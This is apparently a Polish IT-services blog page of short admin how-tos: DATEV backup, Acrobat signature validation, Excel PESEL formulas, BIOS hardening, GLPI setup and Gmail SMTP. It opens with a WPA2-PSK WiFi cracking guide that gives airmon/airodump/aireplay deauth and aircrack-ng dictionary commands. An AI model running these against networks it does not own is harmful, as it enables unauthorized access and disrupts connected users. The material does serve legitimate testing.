Category Archives: Inne

Inne problemy

Łamanie hasła do sieci bezprzewodowej WiFi WPA2-PSK

W celu złamania hasła do sieci WiFi wykorzystany został w tym przypadku system Kali Linux w wersji 2025.2 oraz karta sieciowa Intel Dual Band Wireless-AC 8265.

W skrócie oto lista kroków jakie trzeba wykonać:

Zainstalowanie poprawnego sterownika karty sieciowej;
Ustawienie karty sieciowej w tryb monitorowania;
Rozpoczęcie przechwytywania pakietów;
Rozłączenie klienta, który jest aktualnie podłączony do sieci w celu jego ponownego połączenia i przechwycenia w ten sposób pakietów autoryzacyjnych;
Wyłączenie trybu monitorowania karty sieciowej;
Rozkodowanie hasła z przechwyconych pakietów (z pliku z rozszerzeniem .cap);

Skonfigurowanie karty w tryb monitorowania

airmon-ng check
airmon-ng check kill
airmon-ng start wlan0

Airmon utworzy nowy interfejs sieciowy, w tym przypadku o nazwie wlan0mon. Do wyświetlenia wszystkich interfejsów bezprzewodowych służy polecenie iwconfig.

Wyświetlenie wszystkich sieci bezprzewodowych w pobliżu

airodump-ng wlan0mon

Rozpoczęcie przechwytywania pakietów do pliku capture_file

airodump-ng wlan0mon --bssid MAC_ADDRESS_OF_AP_HERE -c CHANNEL_NUMBER_HERE -w ./capture_file

Rozłączenie aktualnie podłączonego klienta w celu przechwycenia pakietów handshake – nawiązujących połączenie:

aireplay-ng wlan0mon --deauth NUMBER_OF_PACKETS_EGZAPLE_20 -a MAC_ADDRESS_OF_AP_HERE -h MAC_ADDRESS_OF_COMPUTER_CONNECTED_TO_NETWORK_HERE

Po wyświetleniu napisu WPA handshake: MAC_ADDRESS_OF_AP można zakończyć przechwytywanie pakietów.

Łamanie hasła za pomocą narzędzia aircrack-ng

aircrack-ng -w FILE_WITCH_WORDLIST wpa2-01.cap

Wyłączenie trybu monitorowania karty sieciowej

airmon-ng stop wlan0mon

Restart serwisu

service network-manager start

Listy słownikowe do łamania haseł metodą bruteforce można pobrać pod adresem:

https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html

DATEV Audit – tworzenie kopii bezpieczeństwa, odinstalowanie programu.

Aby utworzyć kopię bezpieczeństwa programu DATEV Audit należy uruchomić DATEV SQL Manager (Start -> wpisać: dsqlm) i zamknąć bazę programu.
Następnie należy przekopiować katalog C:\ProgramData\DATEV\Daten w bezpieczne miejsce.

Najprostszym sposobem odinstalowania programu jest pobranie narzędzia deinstnacharbeitentool.exe ze strony: https://download.datev.de/download/deinstallationsnacharbeiten_v311/deinstnacharbeitentool.exe i uruchomienie go z poświadczeniami administratora.

Ostatnim krokiem jest usunięcie katalogu C:\ProgramData\DATEV-NetInfo

Źródło: https://apps.datev.de/help-center/documents/1080019

Acrobat Reader – jak rozwiązać problem z walidacją podpisu elektronicznego.

Ostatnio napotykane są coraz częstsze problemy z weryfikacją podpisu elektronicznego w plikach PDF. Zamiast zielonego „ptaszka” pojawia się znak zapytania, mówiący że Acrobat Reader nie może zweryfikować podpisu elektronicznego. Aby rozwiązać problem należy wczytać / zaktualizować listę zaufanych certyfikatów z serwera Adobe. Aby tego dokonać należy wejść w: Menu -> Preferencje -> Menadżer zaufania i zaznaczyć opcje (jeżeli nie są zaznaczone):
„Wczytaj zaufane certyfikaty z serwera Adobe AATL”
oraz
„Wczytaj zaufane certyfikaty z serwera Adobe EUTL”
Należy również kliknąć na przycisk „Uaktualnij teraz” przy obu w/w opcjach.
Następnie najlepiej wyłączyć i włączyć ponownie program Acrobat Reader.

Excel – anonimizacja arkusza, rok, płeć z numeru PESEL

Wyciągnięcie roku z numeru PESEL:

=JEŻELI(WARTOŚĆ(FRAGMENT.TEKSTU(A1;3;2))>12;2000 + LEWY(A1;2);1900 + LEWY(A1;2))

Wyciągnięcie płci z numeru PESEL:

=JEŻELI(MOD(FRAGMENT.TEKSTU(A1;10;1);2)=0;"K";"M")

Zabezpieczenie stacji roboczej na poziomie BIOSu na przykładzie Lenovo Neo 50s

Konfiguracja BIOS:

Założenie hasła na konto admina;
Devices: Card Reader, Bluetooth – disable;
Network Setup: Wireless Lan Access, PXE IPv4, IPv6 – disable;
Security: Device Guard – enable, Secure boot – enable, Security Chip 2.0 – enable;
Startup: First Boot Device – m.2 drive, USB Boot Support – disable;

Zamknięcie obudowy na zamek.

Zabezpieczony: Strony internetowe

Calibre – darmowy konwerter ebook-ów

Program Calibre (https://calibre-ebook.com/) jest świetnym darmowym oprogramowaniem służącym do konwersji różnego rodzaju plików (ebook-ów), np. formatu epub na pdf itp.

ESET – pokaż opcje skanowania

Interfejs użytkownika -> Alerty i okna komunikatów -> Interaktywne alerty -> Lista interaktywnych alertów -> Edytuj -> Wykryto nowe urządzenie: pokaż opcje skanowania

GLPI – instalacja na Windows ( XAMPP 8.1.2 – Apache 2.4.52, PHP 8.1.2)

W pliku php.ini należy dodać/odkomentować linie:
extension=sodium
extension=intl
extension=imap
extension=ldap
extension=gd
zend_extension=opcache
extension=php_apcu.dll
extension=php_xmlrpc.dll
Ściągnąć pliki z stron:
https://pecl.php.net/package/APCu/5.1.21/windows
https://pecl.php.net/package/xmlrpc/1.0.0RC3/windows – jak jeden plik .dll nie działa to drugi 🙂
Ściągnięte pliki (tj. php_apcu.dll oraz php_xmlrpc.dll) wgrać do katalogu: C:\xampp\php\ext
Skopiować php/libsodium.dll do apache/bin/
Restart serwera Apache

Wykorzystywanie konta Gmail w aplikacjach

Czasem zachodzi potrzeba wykorzystywania konta e-mail, np Gmaila do potrzeb wysyłania logów z serwera (np. przy pomocy darmowego klienta SMTP SendEmail: http://caspian.dotconf.net/menu/Software/SendEmail/). Aby jednak program mógł używać konta Gmail niezbędna jest odpowiednia konfiguracja tego konta a mianowicie zaznaczenie zezwolenia na używanie go w mniej bezpiecznych aplikacjach poprzez wejście w zakładkę: zarządzaj kontem google -> Security -> Less secure app access -> włączenie na ON.

Oto bezpośredni link: https://myaccount.google.com/lesssecureapps

Obsługa IT

Obsługa informatyczna firm i użytkowników indywidualnych. Optymalne rozwiązania informatyczne.